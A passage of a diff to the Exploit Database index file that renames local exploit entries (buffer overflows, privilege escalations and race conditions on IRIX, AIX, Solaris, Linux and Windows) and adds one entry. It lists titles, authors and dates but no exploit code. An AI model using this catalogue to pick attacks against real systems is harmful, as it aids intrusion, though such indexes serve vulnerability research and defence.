Binary Execution",2000-06-28,"Tanaka Akira",unix,local,0 20116,platforms/windows/local/20116.py,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Buffer Overflow (ASLR + DEP Bypass)",2012-07-27,"Ptrace Security",windows,local,0 -20126,platforms/irix/local/20126.c,"IRIX 6.5.x - GR_OSView Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0 -20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 libgl.so - Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0 -20128,platforms/irix/local/20128.c,"IRIX 6.5.x - dmplay Buffer Overflow",2000-08-02,"Last Stage of Delirium",irix,local,0 -20129,platforms/irix/local/20129.c,"IRIX 6.2/6.3 lpstat - Buffer Overflow",1998-11-01,"Last Stage of Delirium",irix,local,0 -20130,platforms/irix/local/20130.c,"IRIX 6.5.x - inpview Race Condition",2000-01-01,"Last Stage of Delirium",irix,local,0 +20126,platforms/irix/local/20126.c,"IRIX 6.5.x - '/usr/sbin/gr_osview' Buffer Overflow",1997-01-01,"Last Stage of Delirium",irix,local,0 +20127,platforms/irix/local/20127.c,"SGI IRIX 6.2 - 'libgl.so' Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0 +20128,platforms/irix/local/20128.c,"IRIX 6.5.x - '/usr/sbin/dmplay' Buffer Overflow",2000-08-02,"Last Stage of Delirium",irix,local,0 +20129,platforms/irix/local/20129.c,"IRIX 6.2/6.3 - '/bin/lpstat' Buffer Overflow",1998-11-01,"Last Stage of Delirium",irix,local,0 +20130,platforms/irix/local/20130.c,"IRIX 6.5.x - '/usr/lib/InPerson/inpview' Race Condition",2000-01-01,"Last Stage of Delirium",irix,local,0 20133,platforms/windows/local/20133.cpp,"Microsoft Windows Server 2000 - Named Pipes Predictability",2000-08-01,Maceo,windows,local,0 20137,platforms/irix/local/20137.c,"IRIX 6.2/6.3/6.4 - xfs truncate() Privilege Check",1997-02-01,"Last Stage of Delirium",irix,local,0 -20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail Exploit",1997-09-01,"Last Stage of Delirium",irix,local,0 +20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - '/usr/bin/mail' Buffer Overflow",1997-09-01,"Last Stage of Delirium",irix,local,0 20141,platforms/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0 20142,platforms/linux/local/20142.sh,"SUIDPerl 5.00503 - Mail Shell Escape (2)",2000-08-07,"Michal Zalewski",linux,local,0 20147,platforms/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool",2000-08-02,suid,solaris,local,0 @@ -7703,13 +7705,13 @@ id,file,description,date,author,platform,type,port 20186,platforms/solaris/local/20186.c,"Solaris 2.6/7.0 /locale - Subsystem Format String",2000-11-02,warning3,solaris,local,0 20187,platforms/immunix/local/20187.c,"Immunix OS 6.2 - LC glibc format string",2000-09-04,"Kil3r of Lam3rZ",immunix,local,0 20188,platforms/solaris/local/20188.c,"Solaris 2.6/7.0 'eject' locale - Subsystem Format String",2000-09-08,warning3,solaris,local,0 -20189,platforms/unix/local/20189.c,"Libc locale - Exploit (1)",2000-09-04,Synnergy.net,unix,local,0 -20190,platforms/unix/local/20190.c,"Libc locale - Exploit (2)",2000-09-04,anonymous,unix,local,0 +20189,platforms/unix/local/20189.c,"Libc locale - Privilege Escalation (1)",2000-09-04,Synnergy.net,unix,local,0 +20190,platforms/unix/local/20190.c,"Libc locale - Privilege Escalation (2)",2000-09-04,anonymous,unix,local,0 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 - User Supplied Format String",2000-09-05,IhaQueR@IRCnet,bsd,local,0 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan Unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0 20201,platforms/linux/local/20201.c,"Nvidia Linux Driver - Privilege Escalation",2012-08-02,anonymous,linux,local,0 20209,platforms/windows/local/20209.cpp,"Microsoft Windows Server 2000 - Still Image Service Privilege Escalation",2000-09-06,dildog,windows,local,0 -20212,platforms/unix/local/20212.c,"GNOME esound 0.2.19 - Unix Domain Socket Race Condition",2000-08-31,"Kris Kennaway",unix,local,0 +20212,platforms/unix/local/20212.txt,"GNOME esound 0.2.19 - Unix Domain Socket Race Condition",2000-08-31,"Kris Kennaway",unix,local,0 20213,platforms/aix/local/20213.txt,"AIX 4.2/4.3 - netstat -Z Statistic Clearing",2000-09-03,"alex medvedev",aix,local,0 20542,platforms/windows/local/20542.rb,"GlobalScape CuteZIP - Stack Buffer Overflow (Metasploit)",2012-08-15,Metasploit,windows,local,0 20230,platforms/sco/local/20230.c,"Tridia DoubleVision 3.0 7.00 - Privilege Escalation",2000-06-24,"Stephen J. Friedl",sco,local,0 @@ -7761,13 +7763,13 @@ id,file,description,date,author,platform,type,port 41031,platforms/windows/local/41031.txt,"aSc Timetables 2017 - Buffer Overflow",2017-01-12,"Peter Baris",windows,local,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 -20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell redirection Race Condition",2000-01-02,proton,unix,local,0 +20436,platforms/unix/local/20436.sh,"Apple Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 20443,platforms/osx/local/20443.sh,"Tunnelblick - Privilege Escalation (2)",2012-08-11,zx2c4,osx,local,0 20451,platforms/windows/local/20451.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_displayparamstmt Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 -20452,platforms/aix/local/20452.c,"IBM AIX 4.x - setsenv Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 -20453,platforms/aix/local/20453.c,"IBM AIX 4.3 digest - Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 -20454,platforms/aix/local/20454.sh,"IBM AIX 4.x - enq Buffer Overflow",2003-04-24,watercloud,aix,local,0 -20455,platforms/aix/local/20455.c,"IBM AIX 4.3.x - piobe Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 +20452,platforms/aix/local/20452.c,"IBM AIX 4.x - '/usr/bin/setsenv' Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 +20453,platforms/aix/local/20453.c,"IBM AIX 4.3 - '/usr/lib/lpd/digest' Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 +20454,platforms/aix/local/20454.sh,"IBM AIX 4.x - 'enq' Buffer Overflow",2003-04-24,watercloud,aix,local,0 +20455,platforms/aix/local/20455.c,"IBM AIX 4.3.x - '/usr/lib/lpd/piobe' Buffer Overflow",2000-12-01,"Last Stage of Delirium",aix,local,0 20456,platforms/windows/local/20456.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_showcolv Buffer Overflow",2000-12-01,"David Litchfield",windows,local,0 20457,platforms/windows/local/20457.c,"Microsoft SQL Server 7.0/2000 / Data Engine 1.0/2000 - xp_peekqueue Buffer Overflow",2000-12-01,@stake,windows,local,0 20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak",2000-11-30,"Lamagra Argamal",linux,local,0 @@ -7809,7 +7811,7 @@ id,file,description,date,author,platform,type,port 20743,platforms/solaris/local/20743.c,"Solaris 2.x/7.0/8 - Xsun HOME Buffer Overflow",2001-04-10,"Riley Hassell",solaris,local,0 20746,platforms/palm_os/local/20746.c,"Strip Password Generator 0.3/0.4/0.5 - Limited Password-Space",2001-04-10,"Thomas Roessler",palm_os,local,0 20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 - IPCS Timezone Buffer Overflow",2001-04-12,"Riley Hassell",solaris,local,0 -20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 - CDE dtsession Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0 +20766,platforms/unix/local/20766.c,"SGI IRIX 6.5 / Solaris 7.0/8 CDE - '/usr/dt/bin/dtsession' Buffer Overflow",2001-04-11,"Last Stage of Delirium",unix,local,0 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 - kcms_configure KCMS_PROFILES Buffer Overflow (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20769,platforms/unix/local/20769.txt,"Siemens Reliant UNIX 5.4 - ppd -T Race Condition",2001-04-14,"Ruiz Garcia",unix,local,0 @@ -7887,7 +7889,7 @@ id,file,description,date,author,platform,type,port 21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow (Metasploit)",2012-09-12,Metasploit,windows,local,0 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 - Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local,0 21091,platforms/windows/local/21091.txt,"UltraEdit 8.2 - FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",windows,local,0 -21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 - piomkapqd Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local,0 +21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 - '/usr/lib/lpd/pio/etc/piomkapqd' Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local,0 21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0 21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 - SWVerify Buffer Overflow",2001-09-03,foo,hp-ux,local,0 21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0 @@ -7919,7 +7921,7 @@ id,file,description,date,author,platform,type,port 21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 - WebTop 'SCOAdminReg.cgi' Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0 -21248,platforms/linux/local/21248.txt,"(Linux Kernel 2.4.17-8) User-Mode Linux - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0 +21248,platforms/linux/local/21248.txt,"User-Mode Linux (Linux Kernel 2.4.17-8) - Memory Access Privilege Escalation",2000-08-25,"Andrew Griffiths",linux,local,0 21258,platforms/linux/local/21258.bat,"Microsoft Windows NT 4.0/2000 - NTFS File Hiding",2002-01-29,"Hans Somers",linux,local,0 21259,platforms/linux/local/21259.java,"Sun Java Virtual Machine 1.2.2/1.3.1 - Segmentation Violation",2002-01-30,"Taeho Oh",linux,local,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 @@ -7952,7 +7954,7 @@ id,file,description,date,author,platform,type,port 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0 -21458,platforms/linux/local/21458.txt,"(Linux Kernel) Grsecurity Kernel Patch 1.9.4 - Memory Protection",2002-05-17,"Guillaume PELAT",linux,local,0 +21458,platforms/linux/local/21458.txt,"Grsecurity Kernel Patch 1.9.4 (Linux Kernel) - Memory Protection",2002-05-17,"Guillaume PELAT",linux,local,0 21462,platforms/freebsd/local/21462.sh,"FreeBSD 4.x - Process Concealment Bypass",2002-05-18,anonymous,freebsd,local,0 21489,platforms/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 - SCOAdmin Symbolic Link",2002-05-29,"Kevin Finisterre",sco,local,0 21496,platforms/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec - Buffer Overflow (1)",2002-05-30,smurf,linux,local,0 @@ -7963,8 +7965,8 @@ id,file,description,date,author,platform,type,port 21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0 21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - 'phgrafx' Privilege Escalation",2002-06-03,badc0ded,linux,local,0 21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - 'phgrafx-startup' Privilege Escalation",2002-06-03,badc0ded,linux,local,0 -21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0 -21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0 +21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - '/usr/photon/bin/phlocale' Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0 +21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - 'PKG-Installer' Buffer Overflow",2002-06-03,badc0ded,linux,local,0 21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local,0 21516,platforms/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 - Terminator Function Format String",2002-06-06,stringz,unix,local,0 21538,platforms/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 - Open File Descriptor",2002-06-12,"Patrick Smith",linux,local,0 @@ -8003,7 +8005,7 @@ id,file,description,date,author,platform,type,port 21691,platforms/windows/local/21691.txt,"Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (8)",2002-08-06,anonymous,windows,local,0 21700,platforms/linux/local/21700.c,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (1)",2002-08-10,"Gobbles Security",linux,local,0 21701,platforms/linux/local/21701.pl,"ISDN4Linux 3.1 - IPPPD Device String SysLog Format String (2)",2002-08-10,"TESO Security",linux,local,0 -21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - SEH + DEP Bypass",2012-10-03,b33f,windows,local,0 +21713,platforms/windows/local/21713.py,"NCMedia Sound Editor Pro 7.5.1 - Overflow (SEH + DEP Bypass)",2012-10-03,b33f,windows,local,0 21720,platforms/irix/local/21720.txt,"SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing",2002-08-16,"Michael Wardle",irix,local,0 21721,platforms/windows/local/21721.html,"Microsoft Internet Explorer 4/5/6 - XML Datasource Applet File Disclosure",2002-08-17,Jelmer,windows,local,0 21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping",2002-08-20,"Derek D. Martin",linux,local,0 @@ -8013,7 +8015,7 @@ id,file,description,date,author,platform,type,port 21761,platforms/linux/local/21761.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)",2002-08-28,RaiSe,linux,local,0 21762,platforms/linux/local/21762.c,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)",2002-08-28,"David Endler",linux,local,0 21763,platforms/linux/local/21763.txt,"Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)",2002-08-28,syscalls,linux,local,0 -21771,platforms/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow",2002-09-04,eSDee,unix,local,0 +21771,platforms/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow Privilege Escalation",2002-09-04,eSDee,unix,local,0 21772,platforms/unix/local/21772.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,unix,local,0 21773,platforms/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,unix,local,0 21774,platforms/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,unix,local,0 @@ -8042,7 +8044,7 @@ id,file,description,date,author,platform,type,port 21872,platforms/linux/local/21872.c,"GV 2.x/3.x - '.PDF'/'.PS' File Buffer Overflow (2)",2002-09-26,infamous42md,linux,local,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module - Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 - Privilege Escalation",2012-10-11,"Nathaniel Carew",windows,local,0 -21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 +21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - 'ERRPT' Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 21922,platforms/windows/local/21922.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 21923,platforms/windows/local/21923.c,"Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow",2002-11-01,Girish,linux,local,0 @@ -8069,7 +8071,7 @@ id,file,description,date,author,platform,type,port 22235,platforms/linux/local/22235.pl,"Nethack 3 - Local Buffer Overflow (3)",2003-02-10,tsao@efnet,linux,local,0 22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0 -22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 +22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0 22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0 22332,platforms/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0 @@ -8101,7 +8103,7 @@ id,file,description,date,author,platform,type,port 22564,platforms/windows/local/22564.c,"FlashFXP 1.4 - User Password Encryption",2003-05-05,DVDMAN,windows,local,0 22565,platforms/linux/local/22565.c,"MySQL 3.x/4.0.x - Weak Password Encryption",2003-05-05,"Secret Squirrel",linux,local,0 22566,platforms/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 - HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",freebsd,local,0 -22567,platforms/linux/local/22567.c,"Leksbot 1.2 - Multiple Unspecified Vulnerabilities",2003-05-06,gunzip,linux,local,0 +22567,platforms/linux/local/22567.c,"Leksbot 1.2 - Multiple Vulnerabilities",2003-05-06,gunzip,linux,local,0 22573,platforms/freebsd/local/22573.pl,"ListProc 8.2.9 - Catmail ULISTPROC_UMASK Buffer Overflow",2003-05-08,kf,freebsd,local,0 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 22580,platforms/freebsd/local/22580.c,"Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local,0 @@ -8130,7 +8132,7 @@ id,file,description,date,author,platform,type,port 22745,platforms/linux/local/22745.c,"Zblast 1.2 - 'Username' Local Buffer Overrun",2003-06-06,V9,linux,local,0 22748,platforms/linux/local/22748.c,"Xaos 3.0 - Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local,0 40410,platforms/windows/local/40410.txt,"AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation",2016-09-22,Tulpa,windows,local,0 -22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - LSMCODE Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0 +22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - 'LSMCODE' Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow",2003-06-06,"Julien LANTHEA",linux,local,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Privilege Escalation",2003-06-14,kf,linux,local,0 22775,platforms/linux/local/22775.txt,"FreeWnn 1.1.1 - JServer Logging Option Data Corruption",2003-06-14,"Stefano Di Paola",linux,local,0 @@ -8156,7 +8158,7 @@ id,file,description,date,author,platform,type,port 22883,platforms/windows/local/22883.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local,0 22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - 'HOME Environment' Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 22911,platforms/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local,0 -22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation",2003-07-16,kf,unix,local,0 +22912,platforms/unix/local/22912.txt,"IBM UniVerse 10.0.0.9 - 'uvadmsh' Privilege Escalation",2003-07-16,kf,unix,local,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - 'HOME Environment' Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local,0 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Buffer Overflow",2003-07-28,c0wboy,linux,local,0 @@ -8179,6 +8181,7 @@ id,file,description,date,author,platform,type,port 23022,platforms/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local,0 23023,platforms/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local,0 23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 - Password Disclosure",2003-08-19,"cyber talon",windows,local,0 +23045,platforms/linux/local/23045.pl,"ViRobot Linux Server 2.0 - Overflow",2003-08-20,kf,linux,local,0 23046,platforms/openbsd/local/23046.c,"OpenBSD 3.3 - 'Semget()' Integer Overflow (1)",2003-08-20,blexim,openbsd,local,0 23047,platforms/openbsd/local/23047.c,"OpenBSD 3.3 - 'Semget()' Integer Overflow (2)",2003-08-20,blexim,openbsd,local,0 23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling (Metasploit)",2012-12-01,Metasploit,windows,local,0 @@ -8231,7 +8234,7 @@ id,file,description,date,author,platform,type,port 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 23655,platforms/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0 -23674,platforms/linux/local/23674.txt,"(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0 +23674,platforms/linux/local/23674.txt,"Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 @@ -8256,9 +8259,9 @@ id,file,description,date,author,platform,type,port 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",linux,local,0 -24062,platforms/unix/local/24062.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (1)",2004-04-25,"Secure Network Operations",unix,local,0 -24063,platforms/unix/local/24063.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (2)",2004-04-25,"Secure Network Operations",unix,local,0 -24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0 +24062,platforms/unix/local/24062.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (1)",2004-04-25,"Secure Network Operations",unix,local,0 +24063,platforms/unix/local/24063.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (2)",2004-04-25,"Secure Network Operations",unix,local,0 +24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0 24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0 24141,platforms/linux/local/24141.txt,"cPanel 5 < 9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0 @@ -8266,7 +8269,7 @@ id,file,description,date,author,platform,type,port 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0 24200,platforms/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass",2004-06-14,"Tan Chew Keong",windows,local,0 -24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 +24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Buffer Overflow",2013-01-18,"Jon Bailey",windows,local,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - X Font Server Local Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 24258,platforms/windows/local/24258.txt,"Aloaha Credential Provider Monitor 5.0.226 - Privilege Escalation",2013-01-20,LiquidWorm,windows,local,0 24277,platforms/windows/local/24277.c,"Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow Privilege Escalation (MS04-020)",2004-07-16,bkbll,windows,local,0 @@ -8395,8 +8398,8 @@ id,file,description,date,author,platform,type,port 40385,platforms/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 -26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 -26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 - GetShell and GetCommand Partial File Disclosure",2006-01-01,xfocus,aix,local,0 +26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration",2005-12-30,xfocus,aix,local,0 +26997,platforms/aix/local/26997.txt,"IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure",2006-01-01,xfocus,aix,local,0 27041,platforms/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable 